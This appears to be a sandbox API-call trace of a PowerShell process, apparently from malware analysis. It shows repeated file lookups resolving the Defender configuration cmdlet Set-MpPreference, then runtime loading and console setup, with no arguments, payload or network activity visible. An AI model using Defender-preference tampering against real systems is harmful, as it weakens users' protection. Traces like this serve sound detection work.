	[0057.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.955] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
	[0057.955] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.955] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
	[0057.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0057.955] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
	[0057.955] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.955] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
	[0057.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.955] GetLastError () returned 0x2
	[0057.955] SetErrorMode (uMode=0x1) returned 0x1
	[0057.956] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.956] GetLastError () returned 0x2
	[0057.956] SetErrorMode (uMode=0x1) returned 0x1
	[0057.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.956] GetLastError () returned 0x2
	[0057.956] SetErrorMode (uMode=0x1) returned 0x1
	[0057.956] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.956] GetLastError () returned 0x2
	[0057.956] SetErrorMode (uMode=0x1) returned 0x1
	[0057.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.956] GetLastError () returned 0x2
	[0057.956] SetErrorMode (uMode=0x1) returned 0x1
	[0057.956] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.956] GetLastError () returned 0x2
	[0057.956] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.957] GetLastError () returned 0x2
	[0057.957] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.957] GetLastError () returned 0x2
	[0057.957] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.957] GetLastError () returned 0x2
	[0057.957] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.957] GetLastError () returned 0x2
	[0057.957] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.957] GetLastError () returned 0x2
	[0057.957] SetErrorMode (uMode=0x1) returned 0x1
	[0057.957] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.958] GetLastError () returned 0x2
	[0057.958] SetErrorMode (uMode=0x1) returned 0x1
	[0057.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.958] GetLastError () returned 0x2
	[0057.958] SetErrorMode (uMode=0x1) returned 0x1
	[0057.958] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.958] GetLastError () returned 0x2
	[0057.958] SetErrorMode (uMode=0x1) returned 0x1
	[0057.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.958] GetLastError () returned 0x2
	[0057.958] SetErrorMode (uMode=0x1) returned 0x1
	[0057.958] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.958] GetLastError () returned 0x2
	[0057.958] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.959] GetLastError () returned 0x2
	[0057.959] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.959] GetLastError () returned 0x2
	[0057.959] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.959] GetLastError () returned 0x2
	[0057.959] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.959] GetLastError () returned 0x2
	[0057.959] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.959] GetLastError () returned 0x2
	[0057.959] SetErrorMode (uMode=0x1) returned 0x1
	[0057.959] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.960] GetLastError () returned 0x2
	[0057.960] SetErrorMode (uMode=0x1) returned 0x1
	[0057.961] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.961] GetLastError () returned 0x2
	[0057.961] SetErrorMode (uMode=0x1) returned 0x1
	[0057.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0057.961] GetLastError () returned 0x2
	[0057.961] SetErrorMode (uMode=0x1) returned 0x1
	[0057.961] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.961] GetLastError () returned 0x2
	[0057.961] SetErrorMode (uMode=0x1) returned 0x1
	[0057.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.963] GetLastError () returned 0xcb
	[0057.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fe6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.964] GetLastError () returned 0x2
	[0057.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fe68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.964] GetLastError () returned 0x2
	[0057.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fe68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.964] GetLastError () returned 0x2
	[0057.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fe68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.964] GetLastError () returned 0x2
	[0058.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.076] GetLastError () returned 0xcb
	[0058.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.373] GetLastError () returned 0xcb
	[0058.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.377] GetLastError () returned 0xcb
	[0058.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.450] GetLastError () returned 0xcb
	[0058.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.454] GetLastError () returned 0xcb
	[0058.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.455] GetLastError () returned 0xcb
	[0058.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.469] GetLastError () returned 0xcb
	[0058.544] VirtualQuery (in: lpAddress=0x55fd6dc, lpBuffer=0x55fe6dc, dwLength=0x1c | out: lpBuffer=0x55fe6dc*(BaseAddress=0x55fd000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0058.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.626] GetLastError () returned 0xcb
	[0058.726] VirtualQuery (in: lpAddress=0x55fd6dc, lpBuffer=0x55fe6dc, dwLength=0x1c | out: lpBuffer=0x55fe6dc*(BaseAddress=0x55fd000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0058.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.731] GetLastError () returned 0xcb
	[0058.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.732] GetLastError () returned 0xcb
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.732] GetLastError () returned 0xcb
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.732] GetLastError () returned 0xcb
	[0058.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.807] GetLastError () returned 0xcb
	[0058.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.808] GetLastError () returned 0xcb
	[0058.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.808] GetLastError () returned 0xcb
	[0058.904] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0058.905] GetLastError () returned 0xcb
	[0058.905] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x55fe220 | out: lpConsoleScreenBufferInfo=0x55fe220) returned 1
	[0058.905] GetLastError () returned 0xcb
	[0058.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.913] GetLastError () returned 0xcb
	[0058.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.918] GetLastError () returned 0xcb
	[0058.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.918] GetLastError () returned 0xcb
	[0058.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x55fdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.918] GetLastError () returned 0xcb
	[0059.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400f18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.101] GetLastError () returned 0xcb
	[0059.271] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0059.271] GetLastError () returned 0xcb
	[0059.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x55fe934 | out: lpConsoleScreenBufferInfo=0x55fe934) returned 1
	[0059.271] GetLastError () returned 0xcb
	[0059.273] GetConsoleOutputCP () returned 0x1b5
